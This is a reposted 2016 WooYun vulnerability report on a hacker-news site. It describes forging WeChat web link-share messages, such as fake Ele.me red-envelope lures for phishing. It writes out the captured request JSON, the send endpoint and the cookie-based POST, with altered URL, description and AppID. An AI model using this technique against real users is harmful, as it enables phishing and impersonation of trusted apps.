记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

微信网页版链接分享漏洞(比如伪造饿了么红包消息钓鱼)

2016-01-21 23:25

首先登录https://wx.qq.com/ 浏览器F12抓包 用手机给自己发个图文链接消息(比如饿了么红包)得到这样一个消息包

1.jpg



整理一下,组装成要发送的封包

code 区域
{"BaseRequest":{"Uin":716107972,"Sid":"SebkHMNCgz8nhpLX","Skey":"@crypt_5e1cf903_8486b15f0d6e617b2dcbc14a634158ea","DeviceID":"e881369842914864"},"Msg":{"Type":5,"Content":"<appmsg appid='wx3fea7a3c94a23944' sdkver='0'><title>领取饿了么红包,看饿了别叫妈,和王祖蓝一起走火入魔</title><des>每周日0点爱奇艺,百变神咖-王祖蓝,魔性上演</des><action></action><showtype>0</showtype><mediatagname></mediatagname><messageext></messageext><messageaction></messageaction><content></content><url>https://m.ele.me/activities/hongbao?hardware_id=3fca613450f7e9a7bdc7d590e4f2ff8f&amp;track_id=1442566941%7C_f85c6d24-5de3-11e5-b23a-c81f66fb98a9%7Cbd6b3eda48770a593bf2a444d486215b&amp;d18:20 2015/12/6 星期日vice_id=b325dc11-26e0-3c79-a918-955dc85b7b34&amp;sn=28cf845bf9a08aa4addc2044d9944866</url><lowurl></lowurl><dataurl></dataurl><lowdataurl></lowdataurl><appattach><totallen>0</totallen><attachid></attachid><emoticonmd5></emoticonmd5><fileext></fileext><cdnthumburl>30590201000452305002010002046d42c1c002030f424302041ff690750204566408a1042e6175706170706d73675f653831313963356364376633353464655f313434393333353932383332325f33313730350201000201000400</cdnthumburl><cdnthumblength>17478</cdnthumblength><cdnthumbwidth>100</cdnthumbwidth><cdnthumbheight>200</cdnthumbheight><cdnthumbaeskey>39333861323861363666626436616431</cdnthumbaeskey><aeskey>39333861323861363666626436616431</aeskey><encryver>0</encryver></appattach><extinfo></extinfo><commenturl></commenturl><thumburl></thumburl><md5></md5></appmsg>","FromUserName":"@db55c0055d9d6319205f8bf6bf63f721ff59fd4e3bae8a87839d0d324a71de0d","ToUserName":"@@d4b99dabd29f735a46cfd5657bbfec4b0aa3e486bd9bf1b7bd0a142be3a13fbe","LocalID":"14493964037650761","ClientMsgId":"14493964037650761"}}





提交的地址

code 区域
https://wx.qq.com/cgi-bin/mmwebwx-bin/webwxsendappmsg?fun=async&f=json





最后附上登录时获取的Cookies发送POST请求

返回

code 区域
{

"BaseResponse": {

"Ret": 0,

"ErrMsg": ""

}

,

"MsgID": "2878317252114451231",

"LocalID": "14494045349370329"

}



发送成功



简单做了一个小程序

2.jpg





3.jpg





4.jpg





再来看微信收到的消息,瞬间被玩坏。。。

从上到下4条消息

第一条:正常红包

第二条:修改了跳转URL

第三条:修改了文字描述

第四条:修改了AppID

Screenshot_2015-12-06-20-09-34.png



Screenshot_2015-12-06-20-15-07.png





漏洞证明:

javascript:void(0)

修复方案:

不知道~

知识来源: www.wooyun.org/bugs/wooyun-2016-0158906

阅读:269598 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“微信网页版链接分享漏洞(比如伪造饿了么红包消息钓鱼)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云